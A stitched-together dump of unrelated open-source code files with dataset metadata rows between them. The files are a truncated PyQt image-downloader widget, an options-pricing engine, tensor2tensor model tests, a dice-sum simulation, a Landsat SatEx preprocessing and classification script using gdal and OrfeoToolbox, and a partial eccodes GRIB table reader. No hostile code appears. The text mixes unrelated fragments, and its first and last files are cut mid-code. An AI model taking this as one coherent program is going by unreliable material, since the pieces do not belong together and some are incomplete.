searchinput.setAttribute("value",self.singer)
# searchinput.setAttribute("readonly","readonly")
def linkClicked(self,url):
# print(url.toString())
url = url.toString()
pattern = re.compile(r'&word=(.*?)&')
s = pattern.findall(url)
k = {'word': s[0]}
kv = urllib.parse.urlencode(k)
url = url.replace("word="+s[0], kv)
res = urllib.request.urlopen(url).read().decode("utf8")
pattern = re.compile(r'currentImg(.*)<div>',re.S)
s = pattern.findall(res)
print(s)
src="http://img3.imgtn.bdimg.com/it/u=673176467,634723054&fm=21&gp=0.jpg"
pattern = re.compile(r'src="(.*?)"')
s = pattern.findall(s[0])
img_url = s[0].replace("&","&")
local = os.path.join('./cache/', self.singer+'.jpg')
user_agent = 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0'
req = urllib.request.Request(img_url)
req.add_header('Referer', 'http://music.baidu.com/?from=new_mp3')
req.add_header('User-Agent', user_agent)
f = urllib.request.urlopen(req)
data = f.read()
with open(local, "wb") as code:
code.write(data)
# self.music.picture.setStyleSheet("QLabel{ background:#9B0069;border-image:url("+local+")}")
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton:
self.drag_flag = True
# if hasattr(self.window, 'widget1'):
# self.begin_position2 = event.globalPos() - \
# self.window.widget1.pos()
self.begin_position = event.globalPos() - self.pos()
event.accept()
self.setCursor(QCursor(Qt.OpenHandCursor))
def mouseMoveEvent(self, QMouseEvent):
if Qt.LeftButton and self.drag_flag:
# if hasattr(self.window, 'widget1'):
# self.window.widget1.move(
# QMouseEvent.globalPos() - self.begin_position2)
# self.window.move(QMouseEvent.globalPos() - self.begin_position)
# else:
self.move(QMouseEvent.globalPos() - self.begin_position)
QMouseEvent.accept()
def mouseReleaseEvent(self, QMouseEvent):
self.drag_flag = False
self.setCursor(QCursor(Qt.ArrowCursor))
# def leaveEvent(self,QMouseEvent):
# self.close()
def mouseDoubleClickEvent(self,e):
self.close()
if __name__ == '__main__':
app = QApplication(sys.argv)
s = Singer("张杰")
sys.exit(app.exec_())
| gpl-3.0 | 6,152,910,160,387,240,000 | 34.090909 | 105 | 0.593971 | false | 3.180524 | false | false | false |
tpoy0099/option_calculator | engine_algorithm/calculate_engine.py | 1 | 12864 | #coding=utf8
import threading as THD
import datetime as DT
import engine_algorithm.data_analyser as ANALYSER
import engine_algorithm.database_adaptor as DADAPTOR
from utility.data_handler import TableHandler
from marketdata.marketdata_adaptor import MarketdataAdaptor
from utility.messager import MessageQueue
from utility.self_defined_types import MessageTypes, PassedIndexType, XAxisType
################################################################
class Engine:
etf_code = '510050.SH'
ETF_QUOTE_HEADERS = ('last_price', 'open_price', 'high_price',
'low_price', 'update_time')
STATISTICS_HEADERS = ('implied_vol', 'delta', 'gamma', 'vega',
'theta', 'intrnic', 'time_value')
#-------------------------------------------------------------
def __init__(self, gui):
self.gui = gui
#original position table
self.ori_positions = None
#etf quote
self.etf = TableHandler()
self.etf.reset(1, Engine.ETF_QUOTE_HEADERS, -1)
#marketdata service
self.md = MarketdataAdaptor()
#database service
self.dp = DADAPTOR.DataProxy()
self.__reloadPositions()
#flow control
self.last_sync_time = DT.datetime.now()
#gui communication
self.msg = MessageQueue()
self.msg_event = THD.Event()
self.msg_thread = THD.Thread(target=self.__handleMessage)
self.msg_thread.start()
return
def quit(self):
self.__pushMsg(MessageTypes.QUIT)
self.msg_thread.join()
#-------------------------------------------------------------
def qryUpdateData(self):
self.__pushMsg(MessageTypes.UPDATE_QUOTE_DATA)
def qryEtfQuoteFeed(self):
self.__pushMsg(MessageTypes.GUI_QUERY_ETF_QUOTE_FEED)
def qryTableDataFeed(self):
self.__pushMsg(MessageTypes.GUI_QUERY_TABLE_FEED)
def qryPositionBasedata(self):
self.__pushMsg(MessageTypes.GUI_QUERY_POSITION_BASEDATA_FEED)
def qryCalGreeksSensibilityByGroup(self, option_group_id, stock_group_id, x_axis_type):
self.__pushMsg(MessageTypes.GUI_QUERY_CAL_SENSI,
(option_group_id, stock_group_id,
PassedIndexType.GROUP, x_axis_type))
def qryCalGreeksSensibilityByPosition(self, option_rows, stock_rows, x_axis_type):
self.__pushMsg(MessageTypes.GUI_QUERY_CAL_SENSI,
(option_rows, stock_rows,
PassedIndexType.ROW, x_axis_type))
def qryExerciseCurveByGroup(self, option_group_id, stock_group_id):
self.__pushMsg(MessageTypes.GUI_QUERY_EXERCISE_CURVE,
(option_group_id, stock_group_id, PassedIndexType.GROUP))
def qryExerciseCurveByPosition(self, option_rows, stock_rows):
self.__pushMsg(MessageTypes.GUI_QUERY_EXERCISE_CURVE,
(option_rows, stock_rows, PassedIndexType.ROW))
def qryReloadPositions(self, positions_data=None):
self.__pushMsg(MessageTypes.GUI_QUERY_RELOAD_POSITIONS, positions_data)
def qrySavePositionCsv(self):
self.__pushMsg(MessageTypes.SAVE_POSITION_CSV)
def __pushMsg(self, msg_type, content=None):
self.msg.pushMsg(msg_type, content)
self.msg_event.set()
def __handleMessage(self):
try:
while True:
msg = self.msg.getMsg()
if msg is None:
self.msg_event.wait()
self.msg_event.clear()
#update marketdata order by user
elif msg.type is MessageTypes.UPDATE_QUOTE_DATA:
self.__updateData()
#qry engine provide table data
elif msg.type is MessageTypes.GUI_QUERY_TABLE_FEED:
self.__feedDataTable()
#qry etf data
elif msg.type is MessageTypes.GUI_QUERY_ETF_QUOTE_FEED:
self.__feedEtfQuote()
#qry position base data for editor
elif msg.type is MessageTypes.GUI_QUERY_POSITION_BASEDATA_FEED:
self.__feedPositionBaseData()
#cal greeks sensibility
elif msg.type is MessageTypes.GUI_QUERY_CAL_SENSI:
self.__calGreekSensibility(msg.content[0], msg.content[1],
msg.content[2], msg.content[3])
elif msg.type is MessageTypes.GUI_QUERY_EXERCISE_CURVE:
self.__calOptionExerciseProfitCurve(msg.content[0], msg.content[1],
msg.content[2])
elif msg.type is MessageTypes.GUI_QUERY_RELOAD_POSITIONS:
self.__reloadPositions(msg.content)
elif msg.type is MessageTypes.SAVE_POSITION_CSV:
self.__savePosition2Csv()
elif msg.type is MessageTypes.QUIT:
break
except Exception as err:
self.gui.onEngineError(err)
#thread terminate
return
#-----------------------------------------------------------
#positions should be a instance of TableHandler
def __reloadPositions(self, positions=None):
if type(positions) is TableHandler:
pos = positions.toDataFrame()
else:
pos, err = DADAPTOR.loadPositionCsv()
if not err is None:
raise Exception('load position csv failed ...')
#save pos
self.ori_positions = pos
#separate data
option_rows = list()
stock_rows = list()
for r in range(0, pos.shape[0]):
code = pos['code'].iat[r]
contract_type = self.md.getContractType(code)
if contract_type in ['call', 'put']:
option_rows.append(r)
else:
stock_rows.append(r)
option_df = pos.iloc[option_rows, :]
stock_df = pos.iloc[stock_rows, :]
self.dp.initialize(option_df, stock_df)
self.__updateData(True)
return
def __savePosition2Csv(self):
DADAPTOR.savePositionCsv(self.ori_positions)
return
def __updateData(self, update_baseinfo=False):
self.last_sync_time = DT.datetime.now()
#stock
self.__updateEtfData()
stk = self.dp.getStockData()
for r in range(0, stk.rows()):
self.__updateStockRow(r)
#option
opt = self.dp.getOptionData()
for r in range(0, opt.rows()):
if update_baseinfo:
self.__updateRowBaseInfos(r)
self.__updateOptionRow(r)
#update database
self.dp.updateData()
return
#update etf price data
def __updateEtfData(self):
etf_last_price = self.md.getLastprice(Engine.etf_code)
self.etf.setByHeader(0, 'last_price', etf_last_price)
self.etf.setByHeader(0, 'update_time', self.md.getLastUpdateTime(Engine.etf_code))
if not self.etf.getByHeader(0, 'open_price') < 0:
self.etf.setByHeader(0, 'high_price', max(etf_last_price, self.etf.getByHeader(0, 'high_price')))
self.etf.setByHeader(0, 'low_price', min(etf_last_price, self.etf.getByHeader(0, 'low_price')))
else:
O = self.md.getDailyOpen(Engine.etf_code)
H = self.md.getDailyHigh(Engine.etf_code)
L = self.md.getDailyLow(Engine.etf_code)
if O and H and L:
self.etf.setByHeader(0, 'open_price', O)
self.etf.setByHeader(0, 'high_price', H)
self.etf.setByHeader(0, 'low_price', L)
return
def __updateStockRow(self, irow):
pos = self.dp.getStockData()
last_price = self.etf.getByHeader(0, 'last_price')
float_profit = ANALYSER.getFloatProfit(pos.getByHeader(irow, 'dir'),
pos.getByHeader(irow, 'lots'),
pos.getByHeader(irow, 'open_price'),
last_price, self.md.getStockMultiplier())
pos.setByHeader(irow, 'last_price', last_price)
pos.setByHeader(irow, 'float_profit', float_profit)
return
#update basic_infos like expiry, strike_price etc.
def __updateRowBaseInfos(self, irow):
pos = self.dp.getOptionData()
code = pos.getByHeader(irow, 'code')
pos.setByHeader(irow, 'type', self.md.getContractType(code))
pos.setByHeader(irow, 'strike', self.md.getStrikePrice(code))
pos.setByHeader(irow, 'expiry', self.md.getExerciseDate(code))
pos.setByHeader(irow, 'left_days', self.md.getDaysBeforeExercise(code))
return
#update
def __updateOptionRow(self, irow):
pos = self.dp.getOptionData()
code = pos.getByHeader(irow, 'code')
last_price = self.md.getLastprice(code)
pos.setByHeader(irow, 'last_price', last_price)
###################################
S = self.etf.getByHeader(0, 'last_price')
K = pos.getByHeader(irow, 'strike')
T = pos.getByHeader(irow, 'left_days')
opt_type = pos.getByHeader(irow, 'type')
#greeks
stat = None
if opt_type.lower() == 'call':
stat = ANALYSER.getStatistics(S, K, T, last_price, True)
elif opt_type.lower() == 'put':
stat = ANALYSER.getStatistics(S, K, T, last_price, False)
if stat:
for header in Engine.STATISTICS_HEADERS:
pos.setByHeader(irow, header, stat[header])
#trade state
float_profit = ANALYSER.getFloatProfit(pos.getByHeader(irow, 'dir'),
pos.getByHeader(irow, 'lots'),
pos.getByHeader(irow, 'open_price'),
last_price, self.md.getOptionMultiplier())
pos.setByHeader(irow, 'float_profit', float_profit)
return
def __feedDataTable(self):
opt_data = TableHandler()
opt_data.copyDataframe(self.dp.getOptionData().getDataFrame())
stk_data = TableHandler()
stk_data.copyDataframe(self.dp.getStockData().getDataFrame())
ptf_data = TableHandler()
ptf_data.copyDataframe(self.dp.getPortfolioData().getDataFrame())
self.gui.onRepTableFeed(opt_data, stk_data, ptf_data)
return
def __feedEtfQuote(self):
snap_etf = TableHandler()
snap_etf.copy(self.etf)
self.gui.onRepEtfQuoteFeed(snap_etf)
return
def __feedPositionBaseData(self):
tdata = TableHandler()
tdata.copyDataframe(self.ori_positions)
self.gui.onRepPositionBasedataFeed(tdata)
return
def __calGreekSensibility(self, option_idx, stock_idx, idx_type, x_axis_type):
opt = self.dp.getOptionData()
stk = self.dp.getStockData()
if idx_type is PassedIndexType.GROUP:
opt_data = opt.getPositionDataByGroupId(option_idx)
stk_data = stk.getPositionDataByGroupId(stock_idx)
elif idx_type is PassedIndexType.ROW:
opt_data = opt.getPositionDataByRowIdx(option_idx)
stk_data = stk.getPositionDataByRowIdx(stock_idx)
else:
return
if x_axis_type is XAxisType.PRICE:
rtn = ANALYSER.getGreeksSensibilityByPrice(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
elif x_axis_type is XAxisType.VOLATILITY:
rtn = ANALYSER.getGreeksSensibilityByVolatility(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
elif x_axis_type is XAxisType.TIME:
rtn = ANALYSER.getGreeksSensibilityByTime(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
else:
return
self.gui.onRepCalGreeksSensibility(rtn, x_axis_type)
return
def __calOptionExerciseProfitCurve(self, option_idx, stock_idx, idx_type):
opt = self.dp.getOptionData()
stk = self.dp.getStockData()
if idx_type is PassedIndexType.GROUP:
opt_data = opt.getPositionDataByGroupId(option_idx)
stk_data = stk.getPositionDataByGroupId(stock_idx)
elif idx_type is PassedIndexType.ROW:
opt_data = opt.getPositionDataByRowIdx(option_idx)
stk_data = stk.getPositionDataByRowIdx(stock_idx)
else:
return
rtn = ANALYSER.getExerciseProfitCurve(opt_data, stk_data,
self.etf.getByHeader(0, 'last_price'))
self.gui.onRepCalExerciseCurve(rtn)
return
| gpl-2.0 | -3,853,331,277,950,889,500 | 40.230769 | 109 | 0.569419 | false | 3.691248 | false | false | false |
tensorflow/tensor2tensor | tensor2tensor/models/image_transformer_2d_test.py | 1 | 3273 | # coding=utf-8
# Copyright 2021 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Transformer."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensor2tensor.data_generators import celeba # pylint: disable=unused-import
from tensor2tensor.data_generators import problem_hparams
from tensor2tensor.models import image_transformer_2d
from tensor2tensor.utils import registry
import tensorflow.compat.v1 as tf
class Img2imgTransformerTest(tf.test.TestCase):
def _test_img2img_transformer(self, net):
batch_size = 3
hparams = image_transformer_2d.img2img_transformer2d_tiny()
hparams.data_dir = ""
p_hparams = registry.problem("image_celeba").get_hparams(hparams)
inputs = np.random.randint(256, size=(batch_size, 4, 4, 3))
targets = np.random.randint(256, size=(batch_size, 8, 8, 3))
with self.test_session() as session:
features = {
"inputs": tf.constant(inputs, dtype=tf.int32),
"targets": tf.constant(targets, dtype=tf.int32),
"target_space_id": tf.constant(1, dtype=tf.int32),
}
model = net(hparams, tf.estimator.ModeKeys.TRAIN, p_hparams)
logits, _ = model(features)
session.run(tf.global_variables_initializer())
res = session.run(logits)
self.assertEqual(res.shape, (batch_size, 8, 8, 3, 256))
def testImg2imgTransformer(self):
self._test_img2img_transformer(image_transformer_2d.Img2imgTransformer)
class Imagetransformer2dTest(tf.test.TestCase):
def _test_imagetransformer_2d(self, net):
batch_size = 3
size = 7
vocab_size = 256
hparams = image_transformer_2d.imagetransformer2d_tiny()
p_hparams = problem_hparams.test_problem_hparams(vocab_size,
vocab_size,
hparams)
inputs = np.random.randint(
vocab_size, size=(batch_size, 1, 1, 1))
targets = np.random.randint(
vocab_size, size=(batch_size, size, size, 3))
with self.test_session() as session:
features = {
"inputs": tf.constant(inputs, dtype=tf.int32),
"targets": tf.constant(targets, dtype=tf.int32),
"target_space_id": tf.constant(1, dtype=tf.int32),
}
model = net(hparams, tf.estimator.ModeKeys.TRAIN, p_hparams)
logits, _ = model(features)
session.run(tf.global_variables_initializer())
res = session.run(logits)
self.assertEqual(res.shape, (batch_size, size, size, 3, vocab_size))
def testImagetransformer2d(self):
self._test_imagetransformer_2d(image_transformer_2d.Imagetransformer2d)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | -4,113,700,404,917,890,000 | 36.62069 | 81 | 0.677666 | false | 3.515575 | true | false | false |
JuanScaFranTru/Simulation | Practico4/ej3.py | 1 | 1227 | from random import random
def udiscreta(a, b):
u = random()
return int(u * (b - a + 1)) + a
def experiment():
"""
Se lanzan simultáneamente un par de dados legales y se anota el resultado
de la suma de ambos. El proceso se repite hasta que todos los resultados
posibles: 2,3,...,12 hayan aparecido al menos una vez.
"""
# Usamos un set para guardar los resultados
throws = set()
iterations = 0
while len(throws) != 11:
# Tiramos los dados. Los valores se distribuyen de manera uniforme en
# el intervalo [1,6] (los valores posible de un dado)
die1 = udiscreta(1, 6)
die2 = udiscreta(1, 6)
# Agregamos el resultado de la suma del lanzamiento
throws.add(die1 + die2)
# Una iteración más ha ocurrido
iterations += 1
return iterations
def ej3(n):
for i in range(4):
prob1 = 0
prob2 = 0
for j in range(n):
prob1 += experiment()
prob2 += experiment() ** 2
mean = prob1 / n
mean2 = prob2 / n
sigma = (mean2 - mean ** 2) ** (1/2)
print("N = ", n, "Media = ", mean, "Desviación estandar =", sigma)
n = n * 10
ej3(100)
| gpl-3.0 | 4,595,522,826,287,092,700 | 25.586957 | 77 | 0.568275 | false | 3.096203 | false | false | false |
GFZ-Centre-for-Early-Warning/REM_satex_plugin | run_as_script.py | 1 | 17723 | class SatEx:
'''
Class for running SatEx as script
'''
def __init__(self,config):
import os
self.config = config
#setup subrpocess differently for windows
self.startupinfo = None
if os.name == 'nt':
self.startupinfo = subprocess.STARTUPINFO()
self.startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
def updatePForm(self):
#get user edits
self.ls_path = self.config['ls_path']+'/'
self.roi = self.config['roi']
self.out_fname = self.config['out_fname1']
if (self.ls_path =='/' or self.roi == '' or self.out_fname == ''):
return False
else:
return True
def updateCForm(self):
#get user edits
self.raster = self.config['raster']
self.in_train = self.config['in_train']
self.out_fname = self.config['out_fname']
self.label = self.config['label']
self.sieve = self.config['sieve']
self.external = self.config['external']
#in case an external SVM is provided the testing is optional
if self.external:
if (self.raster =='' or self.out_fname == '' or self.sieve == ''):
return False
else:
return True
else:
if (self.raster =='' or self.in_train == '' or self.out_fname == '' or self.label == '' or self.sieve == ''):
return False
else:
return True
def select_input_raster(self):
dirname = PyQt4.QtGui.QFileDialog.getExistingDirectory(self.Pdlg, "Select input directory ","",PyQt4.QtGui.QFileDialog.ShowDirsOnly)
def run_preprocessing(self):
"""Run method that performs all the real work"""
valid_input=self.updatePForm()
import utils
import traceback
#import qgis.core
import ogr
import os
import subprocess
try:
import otbApplication
except:
print 'ERROR: Plugin requires installation of OrfeoToolbox'
#find the number of different L8 scenes
#by reading all TIFs splitting off '_Bxy.TIF' and getting unique strings
e = 'Unspecified error'
#instantiate utilities function
ut = utils.utils()
try:
try:
#check if input is not empty string
1/valid_input
except ZeroDivisionError:
e = str('Please fill all required input fields')
raise Exception
try:
#delete any old tmp files that might be in the directory from a killed task
old=ut.delete_tmps(self.ls_path)
#if old > 0: qgis.core.QgsMessageLog.logMessage('Old *satexTMP* files were present. They were deleted.')
if old > 0: print 'Old *satexTMP* files were present. They were deleted.'
except:
e = str('Could not delete old *satexTMP* files. Function utils.delete_tmps.')
raise Exception
try:
pattern = '*.TIF'
scenes = set(['_'.join(s.split('_')[:1]) for s in ut.findFiles(self.ls_path,pattern)])
if len(scenes)==0:
pattern = '*.tif'
scenes = set(['_'.join(s.split('_')[:1]) for s in ut.findFiles(self.ls_path,pattern)])
1/len(scenes)
except ZeroDivisionError:
e = str('Found no scene in {}'.format(self.ls_path))
raise Exception
else:
print str('Found {} scene(s) in {}'.format(len(scenes),self.ls_path))
#check shapefile roi
try:
driver = ogr.GetDriverByName('ESRI Shapefile')
dataSource = driver.Open(self.roi,0)
layer = dataSource.GetLayer()
print str('Using {} as ROI'.format(self.roi))
except AttributeError:
e = str('Could not open {}'.format(self.roi))
raise Exception
#loop through all scenes
out_files = []
for scene in scenes:
#find all bands for scene exclude quality band BQA and B8
try:
bands = [b for b in ut.findFiles(self.ls_path,scene+'*_B'+pattern) if '_BQA' not in b]
bands = [b for b in bands if '_B8' not in b]
#in case of multiple scenes (and not first scene is processed) check if nr of bands are equal
try:
#only if more than one scene and at least second scene
nr_bands
except:
if len(bands)==0:
e = str('Found no bands for scene {}.'.format(scene))
raise Exception
else:
#store number of bands for potential additonal scenes
nr_bands = len(bands)
print str('Found {} bands (if present, excluding B8 and BQA) for scene {} '.format(nr_bands,scene))
else:
if len(bands)!=nr_bands:
e = str('Found {} instead of {} bands (excluding B8 and BQA) for scene {}. If multiple scenes are provided in the input directory, ensure they have equal bands!'.format(len(bands),nr_bands,scene))
else:
print str('Found {} bands (if present, excluding B8 and BQA) for scene {} '.format(len(bands),scene))
except:
raise Exception
#Check if ROI and scene overlap
try:
error,overlap = ut.vector_raster_overlap(self.roi,self.ls_path+bands[0])
except:
e = str('Unspecified error while trying to execute utils.vector_raster_overlap function with {} and {}'.format(self.roi,bands[0]))
raise Exception
if error!='SUCCESS':
e = error
raise Exception
else:
try:
1/overlap
except ZeroDivisionError:
e = str('The provided ROI {} does not overlap with scene {}'.format(self.roi,scene))
raise Exception
#use gdalwarp to cut bands to roi
try:
#go through bands
for band in bands:
cmd = ['gdalwarp','-overwrite','-q','-cutline',self.roi,'-crop_to_cutline',self.ls_path+band,self.ls_path+band[:-4]+'_satexTMP_ROI'+pattern[1:]]
subprocess.check_call(cmd,startupinfo=self.startupinfo)
print str('Cropped band {} to ROI'.format(band))
except:
e = str('Could not execute gdalwarp cmd: {}.\nError is:{}'.format(' '.join(cmd),error))
raise Exception
# Layerstack
try:
#respect order B1,B2,B3,B4,B5,B6,B7,B9,B10,B11
in_files = [str(self.ls_path+b[:-4]+'_satexTMP_ROI'+pattern[1:]) for b in bands]
in_files.sort()
if nr_bands==10:
# For Landsat 8 B10,B11 considered smaller --> resort
in_files = in_files[2:] + in_files[0:2]
out_file = str(os.path.dirname(self.out_fname)+'/'+scene+'_satex_mul'+pattern[1:])
#call otb wrapper
error = ut.otb_concatenate(in_files,out_file)
if error!='success': raise ZeroDivisionError
#append file to list
out_files.append(out_file)
#qgis.core.QgsMessageLog.logMessage(str('Concatenated bands for scene {}'.format(scene)))
print str('Concatenated bands for scene {}'.format(scene))
except ZeroDivisionError:
e = str('Could not execute OTB ConcatenateImages for scene: {}\nin_files: {}\nout_file: {}. \nError is: {}'.format(scene,in_files,out_file,error))
raise Exception
# after all scenes were processed combine them to a virtual raster tile
try:
cmd = ["gdalbuildvrt","-q","-srcnodata","0","-overwrite",self.out_fname]
for f in out_files:
cmd.append(f)
subprocess.check_call(cmd,startupinfo=self.startupinfo)
print str('Merged {} different scenes to {}'.format(len(out_files),self.out_fname))
except subprocess.CalledProcessError:
e = str('Could not execute gdalbuildvrt cmd: {}'.format(' '.join(cmd)))
raise Exception
##add to map canvas if checked
#if self.Pdlg.checkBox.isChecked():
# try:
# self.iface.addRasterLayer(str(self.out_fname), "SatEx_vrt")
# except:
# e = str('Could not add {} to the layer canvas'.format(self.out_fname))
# raise Exception
except:
#self.errorMsg(e)
#qgis.core.QgsMessageLog.logMessage(str('Exception: {}'.format(e)))
print str('Exception: {}'.format(e))
#qgis.core.QgsMessageLog.logMessage(str('Exception occurred...deleting temporary files'))
print str('Exception occurred...deleting temporary files')
ut.delete_tmps(self.ls_path)
else:
#qgis.core.QgsMessageLog.logMessage(str('Processing sucessfully completed'))
#qgis.core.QgsMessageLog.logMessage(str('Deleting temporary files'))
print str('Processing sucessfully completed')
print str('Deleting temporary files')
#self.iface.messageBar().pushMessage('Processing successfully completed, see log for details',self.iface.messageBar().SUCCESS,duration=3)
print 'Processing successfully completed, see log for details'
ut.delete_tmps(self.ls_path)
def run_classification(self):
"""Run method that performs all the real work"""
import utils
import traceback
#import qgis.core
import ogr
import os
import subprocess
#Get user edits
valid_input=self.updateCForm()
#TODO:fix
self.classification_type='libsvm'
self.svmModel = self.in_train[:-4]+'_svmModel.svm'
self.ConfMatrix = self.in_train[:-4]+'_CM.csv'
try:
import otbApplication
except:
print 'ERROR: Plugin requires installation of OrfeoToolbox'
e = 'Unspecified error'
try:
#instantiate utilities functions
ut = utils.utils()
#FIX:overwrite utils function train
print "FIX:overwriting utils function otb_train_cls due to bug in otb"
#def new_train_classifier(raster, train, stats, classification_type, label, svmModel, ConfMatrix):
# cmd = "~/OTB-5.10.1-Linux64/bin/otbcli_TrainImagesClassifier -io.il {} -io.vd {} -io.imstat {} -sample.mv 100 -sample.vfn {} -classifier {} -classifier.libsvm.k linear -classifier.libsvm.c 1 -classifier.libsvm.opt false -io.out {} -io.confmatout {}".format(raster,train,stats,label,classification_type,svmModel,ConfMatrix)
# os.system(cmd)
# return "success"
#ut.otb_train_classifier=new_train_classifier
try:
#check if input is not empty string
1/valid_input
except ZeroDivisionError:
e = str('Please fill all required input fields')
raise Exception
#check if training fields overlap with raster
if not self.external:
try:
error,overlap = ut.vector_raster_overlap(self.in_train,self.raster)
except:
e = str('Unspecified error while trying to execute utils.vector_raster_overlap function')
raise Exception
if error!='SUCCESS':
e = error
raise Exception
else:
try:
1/overlap
except ZeroDivisionError:
e = str('At least one feature in {} does not overlap with {}'.format(self.in_train,self.raster))
raise Exception
#generate image statistics
try:
self.stats = str(self.raster[:-4]+'_stats.xml')
error=ut.otb_image_statistics(str(self.raster),str(self.stats))
if error!='success':raise ZeroDivisionError
#qgis.core.QgsMessageLog.logMessage(str('Calculated image statistics {} for {}'.format(self.stats,self.raster)))
print str('Calculated image statistics {} for {}'.format(self.stats,self.raster))
except ZeroDivisionError:
e = str('Could not execute OTB Image Statistics on: {}. \nError is:{}'.format(self.raster,error))
raise Exception
#differntiate two cases case 1) external SVM provided an case 2) on the fly SVM training
if self.external:
if self.in_train!='':
#use full training set for testing
self.test = self.in_train
#get SVM filename
self.svmModel = self.Cdlg.lineEdit_4.text()
else:
#split training dataset in 80% train 20% testing
[self.error,self.test,self.train] = ut.split_train(self.in_train,self.label,self.startupinfo)
if self.error != 'success':
e=self.error
raise Exception
else:
#qgis.core.QgsMessageLog.logMessage(str('Splitted ground truth data set in {} (~80%) and {} (~20%)'.format(self.train,self.test)))
print str('Splitted ground truth data set in {} (~80%) and {} (~20%)'.format(self.train,self.test))
#train classifier
#on the fly (wrong) confusion matrix gets overwritten later
try:
error=ut.otb_train_classifier(self.raster, self.train, self.stats, self.classification_type, self.label, self.svmModel, self.ConfMatrix)
if error!='success': raise ZeroDivisionError
#qgis.core.QgsMessageLog.logMessage(str('Trained image classifier using {} and {}'.format(self.raster,self.train)))
print str('Trained image classifier using {} and {}'.format(self.raster,self.train))
except ZeroDivisionError:
e = 'Could not execute OTB TrainClassifiers with {} {} {} {} {} {} {}. \nError is:{}'.format(self.raster, self.train, self.stats, self.classification_type, self.label, self.svmModel, self.ConfMatrix,error)
raise Exception
#classify image
try:
error=ut.otb_classification(self.raster, self.stats, self.svmModel, self.out_fname)
if error!='success': raise ZeroDivisionError
print str('Image {} classified as {}'.format(self.raster,self.out_fname))
except ZeroDivisionError:
e = 'Could not execute OTB Classifier with {}, {}, {}, {}. \n Error is: {}'.format(self.raster, self.stats, self.svmModel, self.out_fname,error)
raise Exception
#confusion matrix
try:
#testing is optional in case of externally provided SVM
if self.in_train!='':
print self.out_fname,self.ConfMatrix,self.test,self.label
error=ut.otb_confusion_matrix(self.out_fname,self.ConfMatrix,self.test,self.label)
if error!='success':raise ZeroDivisionError
print str('Confusion matrix calculated on classified image {} with test set {} saved as {}'.format(self.out_fname,self.test,self.ConfMatrix))
except ZeroDivisionError:
e = 'Could not execute OTB Confusion Matrix with {}, {}, {}, {}. \nError is: {}'.format(self.out_fname, self.ConfMatrix, self.test, self.label)
raise Exception
#if sieving is asked perform sieving
#if self.Cdlg.checkBox_3.isChecked():
if (self.config['sieve']!=''):
try:
if os.name=='nt':
cmd = ['gdal_sieve.bat','-q','-st',str(self.sieve),'-8',str(self.out_fname)]
else:
cmd = ['gdal_sieve.py','-q','-st',str(self.sieve),'-8',str(self.out_fname)]
subprocess.check_call(cmd,startupinfo=self.startupinfo)
except subprocess.CalledProcessError:
e = 'Could not execute {}'.format(cmd)
raise Exception
#add to map canvas if checked
#if self.Cdlg.checkBox_2.isChecked():
# try:
# self.iface.addRasterLayer(str(self.out_fname), "SatEx_classified_scene")
# except:
# e = str('Could not add {} to the layer canvas'.format(self.out_fname))
# raise Exception
except:
#self.errorMsg(e)
#qgis.core.QgsMessageLog.logMessage(e)
print e
else:
print str('Processing completed')
print 'Processing successfully completed, see log for details'
def main():
import ConfigParser
#read config
Config = ConfigParser.ConfigParser()
Config.read("config.ini")
#store as dictionary
config = {}
#preprocessing
parameters = ['ls_path','roi','out_fname']
for par in parameters:
try:
config[par] = Config.get("preprocessing",par)
except:
config[par] = ''
#save before overriden
config['out_fname1']= config['out_fname']
#classification
parameters = ['raster','in_train','out_fname','label','sieve','external']
for par in parameters:
try:
config[par] = Config.get("classification",par)
except:
config[par] = ''
#satex instance
satex = SatEx(config)
#workflow
if (config['ls_path']!=''):
satex.run_preprocessing()
else:
print 'No valid preprocessing configuration found. Skipping..'
if (config['raster']!=''):
satex.run_classification()
else:
print 'No valid classification configuration found. Skipping..'
if __name__ == "__main__":
main()
| bsd-3-clause | -9,089,529,124,461,430,000 | 41.912833 | 332 | 0.574903 | false | 4.02887 | true | false | false |
ARPA-SIMC/arkimet | python/arkimet/formatter/eccodes.py | 1 | 3601 | import os
import re
def get_eccodes_def_dir() -> str:
"""
get the list of directories (separated by :) where grib_api/eccodes keep their definitions
"""
path = os.environ.get("ECCODES_DEFINITION_PATH", None)
if path is not None:
return path.split(":")
path = os.environ.get("GRIBAPI_DEFINITION_PATH", None)
if path is not None:
return path.split(":")
return ["/usr/share/eccodes/definitions/"]
class GribTable:
"""
Read a grib table.
edition is the GRIB edition: 1 or 2
table is the table name, for example "0.0"
Returns a table where the index maps to a couple { abbreviation, description },
or nil if the file had no such entry.
For convenience, the table has also two functions, 'abbr' and 'desc', that
return the abbreviation or the description, falling back on returning the table
index if they are not available.
For example:
origins = GribTable(1, "0")
print(origins.abbr(98)) -- Prints 'ecmf'
print(origins.desc(98)) -- Prints 'European Center for Medium-Range Weather Forecasts'
print(origins.abbr(999)) -- Prints '999'
print(origins.desc(999)) -- Prints '999'
"""
cache = {}
re_table_line = re.compile(r"^\s*(?P<idx>\d+)\s+(?P<abbr>\S+)\s+(?P<desc>.+)$")
def __init__(self, edition: int, table: str):
self.edition = edition
self.table = table
self._abbr = {}
self._desc = {}
for path in get_eccodes_def_dir():
# Build the file name
fname = os.path.join(path, "grib" + str(edition), str(table)) + ".table"
try:
with open(fname, "rt") as fd:
for line in fd:
mo = self.re_table_line.match(line)
if not mo:
continue
idx = int(mo.group("idx"))
self._abbr[idx] = mo.group("abbr")
self._desc[idx] = mo.group("desc").strip()
except FileNotFoundError:
pass
def set(self, code: int, abbr: str, desc: str):
"""
Add/replace a value in the table
"""
self._abbr[code] = abbr
self._desc[code] = desc
def has(self, val: int) -> bool:
